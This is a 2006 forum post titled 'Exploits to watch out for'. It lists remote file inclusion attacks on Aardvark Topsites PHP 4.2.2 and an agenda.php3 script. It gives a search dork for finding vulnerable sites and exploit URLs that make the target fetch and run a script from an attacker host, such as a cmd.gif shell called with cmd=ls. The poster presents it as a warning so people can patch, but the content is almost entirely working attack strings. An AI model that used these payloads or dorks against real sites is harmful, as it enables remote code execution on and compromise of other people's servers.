#1  
Old 30th April 2006, 21:08
sbovisjb1 sbovisjb1 is offline
Senior Member
 
Join Date: Feb 2006
Posts: 176
Thanks: 0
Thanked 1 Time in 1 Post
 
Default Exploits to watch out for

WATCH out for these and tell me if you have developed a method/patch for fixing them, these exploits are highly volatile.

Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL: http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"

Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls

-------------------------------------------------------------------------------------------------------------------

Exploitation: remote file inclusion

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?
Reply With Quote
Sponsored Links
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Empty messages jysse Installation/Configuration 5 15th August 2005 09:33


All times are GMT +2. The time now is 06:52.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.